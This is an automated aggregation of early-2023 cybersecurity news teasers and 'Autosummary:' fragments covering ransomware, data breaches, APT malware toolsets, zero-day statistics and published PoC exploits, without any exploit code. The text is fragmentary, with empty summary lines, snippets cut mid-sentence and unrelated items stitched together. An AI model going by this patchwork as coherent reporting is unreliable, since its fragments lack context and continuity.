Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, DDoS-for-hire) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "SecureAuth and HashiCorp partnership will enable organizations to leverage SecureAuth’s advanced passwordless authentication and Multi-Factor Authentication (MFA) device recognition. To increase security and deployment velocity for cloud DevOps environments, SecureAuth delivers support for Arculix MFA into the HashiCorp Cloud Platform (HCP) Vault via the Command Line Interface (CLI) and Application Programming Interface (API). Organizations can easily authenticate into HCP Vault using single sign on (SSO) with SecureAuth’s Arculix. SecureAuth ensures that users have better security … More
The post SecureAuth and HashiCorp join forces to deliver passwordless continuous authentication appeared first on Help Net Security.
"Autosummary:
"Organizations worldwide pay ransomware fees instead of implementing solutions to protect themselves. The ransom is just the tip of the iceberg regarding the damage a ransomware attack can wreak. In this Help Net Security video, Gerasim Hovhannisyan, CEO at EasyDMARC, discusses how domain authentication tools such as DKIM, SPF, and DMARC can help mitigate risk and limit the number of phishing attacks, identifying fraudulent messages before they even hit the receiver’s inbox and making organizations … More
The post Why organizations shouldn’t fold to cybercriminal requests appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
RESERVE YOUR SEAT Other utilities deployed include CLEXEC, a backdoor capable of executing commands and clearing event logs; COOLCLIENT and TROCLIENT, implants that are designed to record keystrokes as well as read and delete files; and PlugX. "Apart from well-known legitimate tools, the threat actors also crafted highly customized tools used for exfiltration," the researchers noted. "Autosummary:
According to KSN telemetry, DTrack activity has been detected in Brazil, Germany, India, Italy, Mexico, Saudi Arabia, Switzerland, Turkey, and the United States, indicating that DTrack is being distributed into more parts of the world. CISA alerts Iran-backed APT actors CISA (Cybersecurity and Infrastructure Security Agency), the FBI, the NSA (National Security Agency), U.S. Cyber Command (USCC) – Cyber National Mission Force (CNMF), the Department of the Treasury (Treasury) have released a joint advisory, which warns of APT actors affiliated with the Islamic Revolutionary Guard Corps (IRGC) of Iran targeting a broad range of entities, including entities across multiple U.S. critical infrastructure sectors.Once access had been acquired, the operators deployed multiple publicly available tools for reconnaissance, including Mimikatz, EarthWorm, ReGeorg, and NBTscan, and then deployed their custom implants: a first-stage loader, followed by a second stage .NET loader (PNGLoad). POLONIUM’s toolset consists of seven custom backdoors: CreepyDrive, which abuses OneDrive and Dropbox cloud services for C&C; CreepySnail, which executes commands received from the attackers’ own infrastructure; DeepCreep and MegaCreep, which make use of Dropbox and Mega file storage services, respectively; and FlipCreep, TechnoCreep, and PapaCreep, which receive commands from attackers’ servers.The attack targeted over a dozen organizations, including industrial plants, design bureaus and research institutes, government agencies, ministries and departments in several East European countries (Belarus, Russia, and Ukraine), as well as Afghanistan.The targets include organizations in the engineering, IT, law, communications, branding and marketing, media, insurance, and social services sectors.The payloads used include information stealers, keyloggers, PowerSploit scripts, PlugX/Korplug, Trochilus RAT, QuasarRAT, publicly available tools, etc. In its first wave of attacks, the threat actor, which has been dubbed Earth Longzhi, targeted government organizations, infrastructure companies, and healthcare companies in Taiwan, as well as Chinese banks.In the new series of attacks, the attackers used six different backdoors (PortDoor, nccTrojan, Cotx, DNSep, Logtu, and CotSam) at the same time – probably to set up redundant communication channels with infected systems in case one of the malicious programs was removed by an antivirus solution. Cloud Atlas/Inception attacks Researchers at CheckPoint have observed Cloud Atlas (aka Inception) campaigns focused on very specific targets in Belarus, mainly in the country’s transportation and military radio-electronics sectors, and in Russia, including the government sector, energy and metal industries, since June 2022.Microsoft experts have observed activity targeting employees in organizations across multiple industries, including media, defense and aerospace, and IT services in the USA, UK, India, and Russia. "Autosummary:
Empty MSI payloads (Intezer) Intezer"s analysts could not retrieve any actual payloads delivered in this campaign but hypothesized that they might include keyloggers, RATs (remote access tools), and info-stealers. "Autosummary:
Soon after, OpenAI took ChatGPT offline to investigate an issue but did not provide details as to what caused the outage Status message during ChatGPT outage Open-source library bug behind data leak Today, OpenAi published a post-mortem report explaining that a bug in the Redis client open-source library caused the ChatGPT service to expose other users" chat queries and the personal information for approximately 1.2% of ChatGPT Plus subscribers. "Autosummary:
In the Accellion attacks, Clop stole massive amounts of data and demanded $10 million ransoms from high-profile companies such as energy giant Shell, cybersecurity firm Qualys, supermarket giant Kroger, and universities worldwide (e.g., Stanford Medicine, University of Colorado, and the University of California). "Autosummary:
"Going forward, people who wish to use these services can"t be sure who is actually behind them, so why take the risk?" In December 2022, the U.S. Department of Justice and the FBI announced the seizure of 48 domains that sold "booter" services in the context of "Operation PowerOFF. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @BleepinComputer, @Seifreed, @fwosar, @malwrhunterteam, @LawrenceAbrams, @serghei, @demonslay335, @billtoulas, @PogoWasRight, @cyfirma, @pcrisk, @Trellix, and @jgreigj. "Autosummary:
"To address this vulnerability, you must install the Outlook security update, regardless of where your mail is hosted (e.g., Exchange Online, Exchange Server, some other platform) or your organization’s support for NTLM authentication," the Microsoft Incident Response team said. "Clop ransomware gang added the City of Toronto to the list of its victims, it is another organization compromised by exploiting GoAnywhere zero-day. Clop ransomware gang added the City of Toronto to the list of victims published on its Tor leak site. The City was targeted as part of a campaign exploiting the recently disclosed zero-day vulnerability in […]
The post City of Toronto is one of the victims hacked by Clop gang using GoAnywhere zero-day appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, City of Toronto) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "The US Cybersecurity and Infrastructure Security Agency (CISA) announced the Pre-Ransomware Notifications service to help organizations stop ransomware attacks before damage occurs. The US Cybersecurity and Infrastructure Security Agency announced a new Pre-Ransomware Notification initiative that aims at alerting organizations of early-stage ransomware attacks. The principle behind the initiative is simple, ransomware actors initially gain access […]
The post CISA announced the Pre-Ransomware Notifications initiative appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CISA) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Thom Langford – @thomlangford Episode links: Sponsored by: Bitwarden – Password security you can trust. "The Transportation Security Administration (TSA) recently issued new cybersecurity requirements for the aviation industry, which follows last year’s announcement for railroad operators. Both announcements are part of the Department of Homeland Security’s effort to improve the nation’s cybersecurity resiliency and align with the National Cybersecurity Strategy released by the White House earlier this month. While the strategy is not perfect, it draws attention to the importance of zero trust within our nation’s critical infrastructure. Just … More
The post A closer look at TSA’s new cybersecurity requirements for aviation appeared first on Help Net Security.
"Autosummary:
Within the TSA emergency amendment are four actions that TSA-regulated aviation entities must take to mitigate cybersecurity threats: Network segmentation Creation of access control measures Implementation of continuous monitoring and detection, and Reduction of risk of exploited unpatched systems By constantly verifying and monitoring user and device activity, aviation organizations can achieve a higher level of security and better manage their cyber risk. "Between January 2021 and October 2022, the EU Agency for Cybersecurity (ENISA) analyzed and mapped the cyber threats faced by the transport sector, identifying prime threats, analyzing incidents, assessing threat actors, analyzing their motivations, and introducing major trends for each sub-sector, thereby providing new insights. EU Agency for Cybersecurity Executive Director, Juhan Lepassaar, stated that “Transport is a key sector of our economy that we depend on in both our personal and professional lives. Understanding … More
The post Cyber threats to EU transport sector sends urgent call for enhanced cybersecurity appeared first on Help Net Security.
"Autosummary:
Attacks by hacktivists are on the rise Ransomware attacks Data related threats Malware Denial-of-service (DoS), distributed denial-of-service (DDoS) and ransom denial-of-service (RDoS) attacks Phishing / spear phishing Supply-chain attacks Ransomware attacks have become the most prominent threat against the sector in 2022, with attacks having almost doubled, rising from 13% in 2021 to 25% in 2022. "Vumetric Cybersecurity has launched its Penetration Testing as-a-Service (PTaaS) platform, designed to simplify and modernize cybersecurity assessments for organizations of all sizes. The Vumetric PTaaS platform revolutionizes the penetration testing process by providing self-service capabilities that allow organizations to schedule and manage assessments on-demand. The platform’s interactive reporting provides a comprehensive view of identified risks and prioritized remediation strategies. Stakeholders can easily access results, track improvements over time, and analyze project results without additional effort, … More
The post Vumetric PTaaS platform simplifies cybersecurity assessments for organizations appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"This threat actor"s activities include collecting financial, personal, and client data specifically from academic, manufacturing, and national security industries in South Korea," Google-owned threat intelligence firm Mandiant disclosed last year. "Autosummary:
Interestingly, the Nexus authors have laid out explicit rules that prohibit the use of its malware in Azerbaijan, Armenia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, Uzbekistan, Ukraine, and Indonesia. "Autosummary:
Finding #2: Tech Companies Score Average Among sectors, energy and financial industries came out on top for overall cybersecurity maturity level, while healthcare, retail, and government agencies were among the lowest. "Dole Food Company confirmed that threat actors behind the recent ransomware attack had access to employees’ data. Dole Food Company is an Irish agricultural multinational corporation, it is one of the world’s largest producers of fruit and vegetables, operating with 38,500 full-time and seasonal employees who supply some 300 products in 75 countries. Dole reported 2021 revenues of $6.5 […]
The post Dole discloses data breach after February ransomware attack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Dole Food Company) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Published 26 minutes ago Image source, Getty Images Image caption, US influencer Charli D"Amelio would be keen to avoid a ban - she has 150m followers on TikTok The US government is demanding that TikTok"s Chinese owners sell the social media platform, or risk facing a ban.Media caption, Watch: The fight over TikTok explained in 60 seconds Notably, variants of the app have popped up online, which people can download to their modified devices in order to use it. "Autosummary:
SHA-3 HMAC algorithms: HMAC-SHA3-256, HMAC-SHA3-384, HMAC-SHA3-512 SHA-3 derived algorithms: extendable-output functions (XOF) (SHAKE128, SHAKE256), customizable XOFs (cSHAKE128, cSHAKE256), and KMAC (KMAC128, KMAC256, KMACXOF128, KMACXOF256). "Autosummary:
PNG file affected by the Acropalypse flaw Source: BleepingComputer In the new Windows 11 Snipping Tool version 11.2302.20.0, when cropping data and overwriting the original file, the software will now correctly truncate the unused data, leaving only one IEND data chunk in the image. "Autosummary:
"Autosummary:
In the case of onyxproxy, the authors used the identifiers "__import__," "subprocess," and "CryptUnprotectData," which are larger and have a vast number of variants, easily beating string-matching-based defenses. "Autosummary:
"Experts warn of an emerging Android banking trojan dubbed Nexus that was employed in attacks against 450 financial applications. Cybersecurity firm experts from Cleafy warn of an emerging Android banking trojan, named Nexus, that was employed by multiple groups in attacks against 450 financial applications. The Nexus ransomware was first analyzed in early March by researchers from the […]
The post Nexus, an emerging Android banking Trojan targets 450 financial apps appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, malware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"We were recently contacted by a ransomware group, calling themselves Cl0p, who illegally obtained some Virgin Red files via a cyber-attack on our supplier, GoAnywhere," a Virgin spokesperson told BleepingComputer. "Researchers released a PoC exploit code for a high-severity vulnerability in Veeam Backup & Replication (VBR) software. Veeam recently addressed a high-severity flaw, tracked as CVE-2023-27532, in Veeam Backup and Replication (VBR) software. An unauthenticated user with access to the Veeam backup service (TCP 9401 by default) can exploit the flaw to request cleartext credentials. A remote […]
The post Experts published PoC exploit code for Veeam Backup & Replication bug appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Backup & Replication) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
On the first day, Pwn2Own competitors were awarded $375,000 and a Tesla Model 3 after successfully demoing 12 zero-days in the Tesla Model 3, Windows 11, Microsoft SharePoint, Oracle VirtualBox, and macOS. "Categories: News Tags: emotet Tags: malware Tags: IRS Tags: scam Tags: email Tags: W-9 Tags: word Tags: document Tags: macro Tags: macros We look at a current tax scam in circulation which looks to make an Emotet deposit on your PC. |
The post Beware: Fake IRS tax email delivers Emotet malware appeared first on Malwarebytes Labs.
"Autosummary:
Avoiding tax scams Here are some of the ways you can outsmart tax fraudsters and keep one step ahead of the phishing, malware, and social engineering attacks which come around every year during tax season.The email, which contains an attachment and very little text, looks like this: The rather short message reads as follows: Let me know if you would like a hard copy mailed as well.Mostly featuring in email spam campaigns, a big focus of fake mails helping to deliver the infection include subjects like parcel shipping, invoices, and other forms of payment. "Categories: News Tags: ATM Tags: bitcoin Tags: cryptocurrency Tags: wallet Tags: hot Tags: cold Tags: 0 day Tags: zero day We look at a $1.5m heist of cryptocurrency via compromised Bitcoin ATMs. |
The post Zero-day spells disaster for Bitcoin ATM appeared first on Malwarebytes Labs.
"Autosummary:
It remains to be seen if anyone is able to recover their funds, but losing money in any cryptocurrency scenario is always a very risky business because they are generally, by design, unable to roll back fraudulent transactions. Keeping your hot wallet safe Your cryptocurrency wallet type is an article all to its own, but in most cases you’re going to have a wallet which is hot or cold.As a result, the attacker could send funds from hot wallets, and at least 56 Bitcoins were stolen before we could release the patch. "Categories: News Tags: RAT Tags: ukraine Tags: trojan Tags: arrest Tags: game Tags: application Tags: fake We take a look at news of an arrest in Ukraine regarding the creator of a remote access trojan. |
The post Malware creator who compromised 10,000 computers arrested appeared first on Malwarebytes Labs.
"Autosummary:
According to the announcement, the RAT could tell infected devices to: Download and upload files Install and uninstall programs Take screenshots Capture sound from microphones Capture video from cameras Once data was harvested by the RAT, some of it was put to further use: Account theft and withdrawal of electronic funds contained in compromised balances are both mentioned in the police release. "Cyberattacks often begin with an unsuspecting user clicking on a link that redirects them to a harmful site containing malware. Even the best employee training won’t prevent every mistake. The best way to stop those mistakes from becoming costly cyber incidents is to block those sites automatically. Since 2020, The Center for Internet Security (CIS) and Akamai have teamed up to offer Malicious Domain Blocking and Reporting (MDBR), a program that has blocked more than … More
The post CIS expands partnership with Akamai to protect state and local governments appeared first on Help Net Security.
"Autosummary:
"A mere 15% of organizations globally have the ‘mature’ level of readiness needed to be resilient against today’s modern cybersecurity risks, according to a Cisco report. Organizations have moved from an operating model that was largely static – where people operated from single devices from one location, connecting to a static network – to a hybrid world in which they increasingly operate from multiple devices in multiple locations, connect to multiple networks, access applications in … More
The post Bridging the cybersecurity readiness gap in a hybrid world appeared first on Help Net Security.
"Autosummary:
Organizations have moved from an operating model that was largely static – where people operated from single devices from one location, connecting to a static network – to a hybrid world in which they increasingly operate from multiple devices in multiple locations, connect to multiple networks, access applications in the cloud and on the go, and generate an enormous amount of data. "Not only do security vulnerabilities lurk within software, but they can also be embedded directly into hardware, leaving technical applications open to widespread attack. For their project, the researchers took thousands of microscopic images of microchips. Pictured here is such a chip in a golden chip package. The chip area that was inspected only measures about two square millimeters. Researchers from Ruhr University Bochum, Germany, and the Max Planck Institute for Security and Privacy (MPI-SP) … More
The post How to combat hardware Trojans by detecting microchip manipulations appeared first on Help Net Security.
"Autosummary:
“It’s conceivable that tiny changes might be inserted into the designs in the factories shortly before production that could override the security of the chips,” explains Dr. Steffen Becker and gives an example for the possible consequences: “In extreme cases, such hardware Trojans could allow an attacker to paralyze parts of the telecommunications infrastructure at the push of a button.” The research team has generously made available all chip images, design data, and analysis algorithms online at no cost, enabling fellow researchers to access and utilize these resources for their own investigations and advancements in the field. "Google has announced the startups chosen for its Cybersecurity Startups Growth Academy. The 15 selected startups are from eight countries and were chosen from over 120 applicants. They have made significant contributions, from securing health applications to protecting educators and safeguarding the clean water supply chain. The selected companies will receive mentoring sessions from Google experts, including former VirusTotal and Mandiant startups. Additionally, they will have opportunities to network with other cybersecurity entrepreneurs at events … More
The post These 15 European startups are set to take the cybersecurity world by storm appeared first on Help Net Security.
"Autosummary:
That’s according to new research we’ve released in partnership with Kantar — “Europe’s SMEs in the Digital Decade 2030” — which also finds that attackers targeting unprepared companies can get more data in less time than ever before, due to the smallest cybersecurity lapses,” Royal Hansen, VP of Engineering for Privacy, Safety, and Security at Google, wrote in a blog post. (Luxembourg): Company serving 15,000 organizations worldwide — “including F500 companies, the defense industry, universities” — which builds an open-source, enterprise password manager. "Autosummary:
Even more troublingly, the connection to the command-and-control (C2) server occurs over HTTP (as opposed to HTTPS), rendering it vulnerable to an adversary-in-the-middle (AiTM) attack. "Autosummary:
RESERVE YOUR SEAT "NAPLISTENER creates an HTTP request listener that can process incoming requests from the internet, reads any data that was submitted, decodes it from Base64 format, and executes it in memory," security researcher Remco Sprooten said. "US health services company Independent Living Systems (ILS) discloses a data breach that impacted more than 4 million individuals. US health services company Independent Living Systems (ILS) disclosed a data breach that exposed personal and medical information for more than 4 million individuals. Independent Living Systems, offers a comprehensive range of turnkey payer services including clinical […]
The post Independent Living Systems data breach impacts more than 4M individuals appeared first on Security Affairs.
"Autosummary:
The notice of data breach states that the types of impacted information varies by individual and could have included, name, address, date of birth, driver’s license, state identification, Social Security number, financial account information, medical record number, Medicare or Medicaid identification, CIN#, mental or physical treatment/condition information, food delivery information, diagnosis code or diagnosis information, admission/discharge date, prescription information, billing/claims information, patient name, and health insurance information. "Autosummary:
The Talos team has also published the following proof of concept (PoC) exploit for the flaw: PoC exploit for CVE-2022-37337 (Cisco) The second problem discovered by Cisco’s analysts is CVE-2022-38452, a high-severity remote command execution vulnerability in the router’s telnet service. "Autosummary:
Another set of vulnerabilities relates to Rockwell Automation"s ThinManager ThinServer and affects the following versions of the thin client and remote desktop protocol (RDP) server management software - 6.x – 10.x 11.0.0 – 11.0.5 11.1.0 – 11.1.5 11.2.0 – 11.2.6 12.0.0 – 12.0.4 12.1.0 – 12.1.5, and 13.0.0 – 13.0.1 The most severe of the issues are two path traversal flaw tracked as CVE-2023-28755 (CVSS score: 9.8) and CVE-2023-28756 (CVSS score: 7.5) that could permit an unauthenticated remote attacker to upload arbitrary files to the directory where the ThinServer.exe is installed. "Autosummary:
ScarCruft, also tracked under the names APT37, Reaper, RedEyes, and Ricochet Chollima, has exhibited an increased operational tempo since the start of the year, targeting various South Korean entities for espionage purposes. "The European Union Agency for Cybersecurity (ENISA) published its first cyber threat landscape report for the transport sector. A new report published by the European Union Agency for Cybersecurity (ENISA) analyzes threats and incidents in the transport sector. The report covers incidents in aviation, maritime, railway, and road transport industries between January 2021 and October […]
The post ENISA: Ransomware became a prominent threat against the transport sector in 2022 appeared first on Security Affairs.
"Autosummary:
During the period covered by the report, the expert identified the following prime threats: ransomware attacks (38%), data related threats (30%), malware (17%), denial-of-service (DoS), distributed denial-of-service (DDoS) and ransom denial-of-service (RDoS) attacks (16%), phishing / spear phishing (10%), supply-chain attacks (10%). "Cisco Talos researchers published PoC exploits for vulnerabilities in Netgear Orbi 750 series router and extender satellites. Netgear Orbi is a line of mesh Wi-Fi systems designed to provide high-speed, reliable Wi-Fi coverage throughout a home or business. The Orbi system consists of a main router and one or more satellite units that work together […]
The post Experts released PoC exploits for severe flaws in Netgear Orbi routers appeared first on Security Affairs.
"Autosummary:
Cisco published a Proof of Concept exploit for this issue: Below is the timeline for this issue that was reported by Dave McDaniel of Cisco Talos: 2022-08-30 – Initial Vendor Contact 2022-09-05 – Vendor Disclosure 2023-01-19 – Vendor Patch Release 2023-03-21 – Public Release Another two issues discovered by the researchers are respectively tracked TALOS-2022-1595 (CVE-2022-38452) and TALOS-2022-1597 (CVE-2022-36429). "Autosummary:
" Memo Dole sent to American grocery stores (Stewart"s) This likely meant that the company would return to manual operations, which would"ve helped resume production and shipments, although at a much slower pace. "Autosummary:
"Eurotech announced its newest edge servers with scalable, cybersecurity certified – AI capabilities. Cyber-threats have become endemic and severely expose states and businesses of all sizes to the risk of loss of data, interruption of services, and direct or indirect monetary impact. Recent surveys have reported that most enterprises face cyber-attacks repeatedly, breaches often originate from a compromised business partner, and the related costs are passed on to customers. “That is why, after establishing ourselves … More
The post Eurotech introduces cybersecurity-certified edge AI solutions appeared first on Help Net Security.
"Autosummary:
Automotive version available ReliaCOR 40-12 Compact ruggedized fanless edge server Ready for AWS and Azure certification 12th gen Intel Core low power Up to 3TB SSD storage, 2x Mini PCIe expansion slots IoT connectivity ready: WiFi/GNSS/BT, 4G/5G cellular Selection criteria: when workload consolidation is required at the edge in a compact form factor and industrial environmental conditions ReliaCOR 54-12 Ruggedized edge AI server 12th gen Intel Core high performance Up to 3TB SSD storage, 2x Mini PCIe + 3x PCIe expansion slots Up to 2x NVIDIA latest gen GPU IoT connectivity ready: WiFi/GNSS/BT, 4G/5G cellular Selection criteria: when workload consolidation meets AI and machine vision at the edge in industrial environmental conditions, and requires scalability to accommodate evolving use cases On all Eurotech’s ReliaCOR products, unauthorized accesses and data manipulations are prevented by a layered secure architecture. "Autosummary:
Clop on a GoAnywhere exploit spree Yesterday, the Clop ransomware gang listed "Saks Fifth Avenue" on its data leak website among their latest victims, as seen by BleepingComputer: Cl0p ransomware claims to have attacked Saks Fifth Avenue (BleepingComputer) The threat actor has not yet disclosed any additional information, such as what all data it stole from the luxury brand retailer"s systems, or details about any ongoing ransom negotiations. "Autosummary:
Among state-sponsored groups, those attributed to China have emerged as the most prolific, exploiting seven zero-days – CVE-2022-24682, CVE-2022-1040, CVE-2022-30190, CVE-2022-26134, CVE-2022-42475, CVE-2022-27518, and CVE-2022-41328 – during the year. "Autosummary:
"Cryptocurrency ATM maker General Bytes suffered a security breach over the weekend, the hackers stole $1.5M worth of cryptocurrency. Cryptocurrency ATM manufacturers General Bytes suffered a security incident that resulted in the theft of $1.5M worth of cryptocurrency. GENERAL BYTES is the world’s largest Bitcoin, Blockchain, and Cryptocurrency ATM manufacturer. The company revealed that the threat […]
The post Crooks stole more than $1.5M worth of Bitcoin from General Bytes ATMs appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, General Bytes) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On “The attacker identified a security vulnerability in the master service interface used by Bitcoin ATMs to upload videos to server.” reported the Security Incident notice published by the company. "Malicious threat actors have actively exploited 55 zero-days in 2022 – down from 81 in 2021 – with Microsoft, Google, and Apple products being most targeted. 53 out of 55 allowed attackers to achieve elevated privileges or execute remote code on vulnerable devices, a new Mandiant report has revealed. “While information disclosure vulnerabilities can often gain attention due to customer and user data being at risk of disclosure and misuse, the extent of attacker actions … More
The post 2022 witnessed a drop in exploited zero-days appeared first on Help Net Security.
"Autosummary:
The distribution of technologies affected by zero-day vulnerabilities remained similar to previous years, with the three largest vendors whose technology is widely adopted across the world being the primary targets: Popular technologies are the most desirable targets Additionally, the products most frequently exploited through zero-day vulnerabilities were: Operating systems (19) Browsers (11) Security, IT, and network management products (10) Mobile operating systems (6) Windows was the OS most often targeted for exploitation (15 zero-days), while macOS zero-days exploited in 2022 were only four. "Italian luxury sports car maker Ferrari has suffered a data breach and has confirmed on Monday that it “was recently contacted by a threat actor with a ransom demand related to certain client contact details,” but that it won’t be paying up. “Instead, we believed the best course of action was to inform our clients and thus we have notified our customers of the potential data exposure and the nature of the incident,” the company … More
The post Ferrari data breach: Client data exposed appeared first on Help Net Security.
"Autosummary:
It is unknown whether this “cyber incident” is related to a previous alleged attack by the RansomEXX ransomware gang, which resulted in 7GB of data – including internal Ferrari documents, datasheets, repair manuals, and more – being leaked online. "Autosummary:
"Ferrari disclosed a data breach after receiving a ransom demand from an unnamed extortion group that gained access to some of its IT systems. Ferrari disclosed a data breach after it received a ransom demand from an unnamed extortion group that breached its IT systems. The threat actor claims to have stolen certain client details. […]
The post Ferrari confirms data breach after receiving a ransom demand from an unnamed extortion group appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Ferrari) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
While this ransomware attack did not impact the City"s 911 and emergency services, other systems had to be taken offline, including phone service and systems used to process reports, collect payments, and issue permits and licenses. "Experts warn that 55 zero-day vulnerabilities were exploited in attacks carried out by ransomware and cyberespionage groups in 2022. Cybersecurity firm Mandiant reported that ransomware and cyberespionage groups exploited 55 zero-day flaws in attacks in the wild. Most of the zero-day vulnerabilities were in software from Microsoft, Google, and Apple. The figures show a decrease […]
The post 2022 Zero-Day exploitation continues at a worrisome pace appeared first on Security Affairs.
"Autosummary:
Seven zero-days (CVE-2022-24682, CVE-2022-1040, CVE-2022-30190, CVE-2022-26134, CVE-2022-42475, CVE-2022-27518, and CVE-2022-41328) were exploited in attacks in the wild by China-linked cyberespionage groups, while two zero-day vulnerabilities were exploited by suspected North Korea-linked APT groups. "Autosummary:
The cropped image on the right Source: BleepingComputer While the cropped image now contains far less data than the original one, the file sizes for the original image file (office-screenshot-original.png) and cropped image file (office-screenshot.png) are the same, as seen below. "Autosummary:
Once inside the victim network, the attackers behind the CommonMagic espionage campaign can use separate plugins to steal documents and files (DOC, DOCX, XLS, XLSX, RTF, ODT, ODS, ZIP, RAR, TXT, PDF) from USB devices. "Categories: News Tags: NBA Tags: data breach Tags: Mailchimp The NBA is warning fans of a data breach at a third-party newsletter service which could result in targeted phishing attempts |
The post The NBA tells fans about data breach appeared first on Malwarebytes Labs.
"Autosummary:
According to BleepingComputer the email read: We recently became aware that an unauthorized third party gained access to, and obtained a copy of, your name and email address, which was held by a third-party service provider that helps us communicate via email with fans who have shared this information with the NBA.Posted: March 21, 2023 by The NBA is warning fans of a data breach at a third-party newsletter service which could result in targeted phishing attempts The National Basketball Association (NBA) has notified its fans they may be affected by a data breach in a third-party service the organization uses. "Despite the economic uncertainty, 57% of organizations plan to increase their cybersecurity budgets in 2023, according to a survey from Arctic Wolf. This highlights a powerful trend: critical needs like security must be addressed even with IT budgets tightening. As 48% of organizations rank ransomware and targeted threats as their number one concern for 2023, how can they allocate that increased cybersecurity budget effectively? In this Help Net Security video, Ian McShane, VP of Strategy … More
The post How to best allocate IT and cybersecurity budgets in 2023 appeared first on Help Net Security.
"Autosummary:
"99% of all businesses across the United States and Canada are mid-sized businesses facing cybersecurity challenges, according to a Huntress report. Aimed to gain insights into organizational structure, resources and cybersecurity strategies, the results contextualize challenges across core functions including gaps in toolkits, planning, staffing, security awareness training and difficulty to secure cybersecurity insurance. Mid-sized businesses cybersecurity challenges 49% of mid-sized businesses plan to budget more for cyber security in 2023 In the last twelve … More
The post Most mid-sized businesses lack cybersecurity experts, incident response plans appeared first on Help Net Security.
"Autosummary:
Mid-sized businesses cybersecurity challenges 49% of mid-sized businesses plan to budget more for cyber security in 2023 In the last twelve months, 24% of mid-sized businesses have suffered a cyber attack or are unsure if they have suffered a cyber attack 61% of mid-sized businesses do not have dedicated cybersecurity experts in their organization 47% of mid-sized businesses do not currently have an incident response plan 27% of mid-sized businesses reported having no cyber insurance coverage “In some regards, this research tells a virtual ‘Tale of Two Cities’ for mid-size and smaller businesses. "Dutch maritime logistics company Royal Dirkzwager suffered a ransomware attack, the company was hit by the Play ransomware gang. The Play ransomware group hit the Dutch maritime logistics company Royal Dirkzwager. Royal Dirkzwager is specialized in optimizing shipping processes and managing maritime and logistic information flows. The ransomware group added the company to its Tor […]
The post Play ransomware gang hit Dutch shipping firm Royal Dirkzwager appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Royal Dirkzwager) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Autosummary:
"The [MSDTC] configurations changed are the name of the account under which the service should run, which is changed from Network Service to Local System, and the service start option, which is changed from Demand start to Auto start for persistency if a restart occurs," Minerva Labs researcher Natalie Zargarov explained in a previous analysis. "Autosummary:
"Autosummary:
Regarding the targeted products, Windows was affected by 15 zero-day flaws in 2022, Chrome comes second with nine actively exploited vulnerabilities, iOS third with 5 zero days, and macOS fourth with four zero-day problems. "Autosummary:
"Autosummary:
Furthermore, researchers from the Kraken cryptocurrency exchange found multiple vulnerabilities in General Bytes" ATMs in 2021, which the company quickly fixed However, even with these security audits, in August 2022, General Bytes had a security incident where hackers exploited a zero-day vulnerability in its ATM servers to steal cryptocurrency from its customers. "The attacker scanned the Digital Ocean cloud hosting IP address space and identified running CAS services on ports 7741, including the General Bytes Cloud service and other GB ATM operators running their servers on Digital Ocean (our recommended cloud hosting provider)," General Bytes explained in a security incident disclosure. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Samsung, Vivo, Google phones open to remote compromise without user interaction Several vulnerabilities in Samsung’s Exynos chipsets may allow attackers to remotely compromise specific Samsung Galaxy, Vivo and Google Pixel mobile phones with no user interaction. Top 50 most impersonated brands by phishing URLs Finance, technology, and telecom brands were the most commonly impersonated industries, notably for the unprecedented access … More
The post Week in review: Kali Linux gets Purple, Microsoft zero-days get patched appeared first on Help Net Security.
"Autosummary:
Top 50 most impersonated brands by phishing URLs Finance, technology, and telecom brands were the most commonly impersonated industries, notably for the unprecedented access and financial benefit that bank accounts, email and social media, and phone companies can give attackers, according to Cloudflare. New infosec products of the week: March 17, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Atakama, Elevate Security, Hornetsecurity, HYPR, and ReversingLabs. "The NBA (National Basketball Association) disclosed a data breach after a third-party firm providing a newsletter service was breached. The NBA (National Basketball Association) is notifying followers of a data breach after a third-party company providing a newsletter service was breached. The National Basketball Association (NBA) is a professional basketball league in Northern America composed […]
The post NBA is warning fans of a data breach after a third-party newsletter service hack appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Upon finding a successful ingress point, the malware takes steps to establish persistence, escalate privileges, carry out lateral movement, and purge log files, files in the Windows Recycle Bin folder, and shadow copies, before initiating the encryption routine. "Autosummary:
